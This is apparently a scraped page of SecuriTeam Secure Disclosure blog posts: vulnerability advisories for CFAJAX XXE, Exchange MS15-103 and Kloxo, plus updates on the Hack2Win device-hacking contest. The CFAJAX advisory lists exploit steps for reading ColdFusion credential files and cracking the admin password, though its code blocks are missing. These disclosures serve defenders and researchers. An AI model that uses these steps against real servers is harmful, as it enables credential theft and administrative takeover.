SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in a few packages that CFAJAX provides, below is an example of exploitation of this vulnerability in Yahoo RSS Reader. The vulnerability is not limited to this software, but to any software that uses CFAJAX.

Unfortunately CFAJAX is no longer maintained (last version came out on Nov 21st 2005), emails sent to the author go unanswered, but it is still found in several web sites we found on the Internet.

Technical Details
The vulnerability is exploited by supplying an XML file to the CFAJAX written program which is vulnerable to an XXE. The XXE vulnerability allows us to read locally stored files, in our example neo-security.xml and password.properties, which we can then crack (through bruteforce) to gain the administrative panel of Coldfusion.

Exploit
1. Send one HTTP POST request to a vulnerable server. Exploit data will not be logged (by default POST request’s payloads don’t get logged), only the URL being accessed.

2. Content of cf-92655311.xml listed below:

3. Content of cdata-xxe.dtd listed below:

4. You should receive a response like this:

4. Extract salt and password values:

5. Now that you have the salt and password. You can crack the password by following these instructions:
Hash is password variable from ./lib/password.properties.
Salt is admin.userid.root.salt variable from ./lib/neo-security.xml

Configuration file for John the Ripper:

6. Recover password and go to admin console (/CFIDE URL)

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – 2nd Day and Summary

At the end of day 2 we had a total of 11 people taking place in the hacking contests, with about 30 people watching them hack live. Thank you all!

I’d like to especially mention the skilled security researchers from Korea, who were the ultimate winners of this contest by finding the most impressive vulnerability as selected by the judges.

As a group they were awarded 1st place and won the cash prize.

We are already thinking about next year’s event. It might be fun to change from IP Cameras to other consumer electronics. The IP cameras were not much of a challenge this year with 2 out of the 3 getting hacked, the 3rd getting totally ‘bricked’, not even working after factory reset.

We will keep you posted on the vendor reaction to these vulnerabilities, with updates on fixes they post and of course additional information on what were the researcher’s findings.

Until next year!

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – 1st Day Update

Hi,

Thank you everyone that participated, we had quite a few participants trying their skills at hacking various networking and IOT devices. Out of the 9 available devices, 2 were removed after they were completely owned, another one was removed because testing of it caused it to do a factory reset and become unreachable (no IP address). The two devices were ZyXEL Media Server, and D-Link DCS-5222L and the device that became unreachable was Tenvis IPROBOT 3 (TZ100).

The ZyXEL Media Server, which is running firmware V4.70(AFK.1) is currently listed as having no known vulnerabilities which are pre-authentication, but in Hack2Win it was compromised to the extent that root access was achieved to the box.

Likewise the D-Link DCS-5222L running firmware 2.03.01, is also currently lists no knownpre-authentication vulnerabilities. The camera feed was obtained without any user credentials, and the participant was able to move the camera physically, and caused it to emit annoying sounds.

Once the vulnerabilities are fixed by the vendors, we will publish full technical details for all of them.

The Tenvis IPROBOT 3 (TZ100) vulnerability that allows you to preform a factory reset is related to the web interface. It can be done remotely, and it is a pre-authentication. Unfortunately for the contest participant, the device was no longer accessible so the vulnerability could not be recreated, nor could be considered more than a denial of service – which does not eligible in our contest.

The participant mentioned that the vulnerability is an exploitable buffer overflow in the device (Tenvis IPROBOT 3), and it can be used to gain access to the device. I am sure that tomorrow, after I have a chance to reconfigure the device, they will be able to repeat the process and get it qualified for a prize – assuming it is more than a denial of service.

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – a CodeBlue Conference Event (Update)

Hi,

Due to some issues importing WiFi equipment into Japan we had to remove the following products from our list of available targets:
 

  • ASUS RT-N16
  • TRENDNet TS-I300W
  • OM2P-HS 802.11gn
  • AXIS 0554-004 M1004-W
  • D-Link AC3200

If you have already found a vulnerability that you were planning on using during the event, don’t be discouraged, it is very likely that we can compensate you by buying it as part of our SSD program. Email me at ssd[@]beyondsecurity.com with the information and we will handle it through our vulnerability research purchasing program SecuriTeam Secure Disclosure program.

We have added to the contest the following items instead:
 

  • TRENDnet HD Wireless Day, Night PTZ Cloud Camera, TV-IP862IC (White)
  • TRENDnet 2-Bay NAS (1 x 1TB) Media Server Enclosure (TN-200T1)
  • TENVIS TZ100 H.264 720P HD P2P Pan & Tilt Wirelss IP/Network Camera with Two-Way Audio and Night Vision (Black)

If you have any questions, comments please email me at ssd[@]beyondsecurity.com.

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

SSD Advisory – Microsoft Exchange Server Information Disclosure Proof of Concept (MS15-103)

 

Introduction
A security vulnerability in Microsoft Exchange has been discovered that allows attackers to cause the server to return the cookie information inside the HTML response.

This would allow an attacker to use Javascript to access, the otherwise inaccessible, cookie information and utilize this information to login to an active Exchange Server’s OWA web mail based session.

The information about how to fix this vulnerability has been disclosed here:
Vulnerabilities in Microsoft Exchange Server Could Allow Information Disclosure (3089250)

However, until now we have not seen any technical description of the vulnerability or how to verify whether you are or not vulnerable without checking for the patch’s existence.

We believe, we cannot be 100% sure, that this vulnerability has been addressed in Microsoft’s patch for CVE-2015-2505.

We were in the process of purchasing this vulnerability for our SecuriTeam Secure Disclosure program, when this advisory came out. So we decided to go ahead and release the information after giving Microsoft’s customers a grace period to deploy this patch.

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – a CodeBlue Conference Event (Japanese)

Hi everyone and thank you Kentaro for the translation,

(Please note there is an update for this event here: https://blogs.securiteam.com/index.php/archives/2653)

An English version is available here: https://blogs.securiteam.com/index.php/archives/2626

今年のCode Blueではスポンサーだけではなく新たな挑戦も提供したいと考えま した。(我々にとってもカンファレンス参加者にとっても新しいチャレンジだと 考えてます。)
 
今年の会場に僕らは11台のデバイスを用意してみんなにハッキングできるかど うか挑戦してもらうと考えています。
 
今回のチャレンジのために様々なデバイスを用意しようと考えてます、各デバイ スは200ドル前後のデバイスで皆さんも気軽にイベント前に購入して実験できる と思ってます。
 
今回チャレンジの対象デバイスは:

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Hack2Win – a CodeBlue Conference Event

Hi everyone,

(Please note there is an update for this event here: https://blogs.securiteam.com/index.php/archives/2653)

A Japanese version is available here: https://blogs.securiteam.com/index.php/archives/2630

We have decided this year to not only sponsor CodeBlue, but also try something new (for us and I believe the conference’s attendees).

We will be bringing 11 devices to the conference premises and allowing people to try their skills at hacking them.

We tried to look wide and far for different devices, all around the 200$ USD mark, so that they won’t be expensive for you to buy and try out before the event

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

SSD Advisory – Kloxo Sensitive Information Disclosure

SecuriTeam Secure Disclosure

SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.

Introduction
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.

Vulnerability Details
Kloxo contains a vulnerability that could allow an authenticated remote attacker (client or auxiliary) to get almost any info from DB, for example passwords of other users (including administrators), credentials for DB connection, etc. After gathering credentials of user (reseller or admin) who has created current client it is possible to assign “admin” role to current client.

Authentication is required to exploit this vulnerability (any unprivileged client or auxiliary). So any unprivileged user will be able to login as administrator and manage system or execute any OS command or upload PHP file and execute desired PHP code (there are such ’legal’ features for administrator).

    SecuriTeam Secure Disclosure

    SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.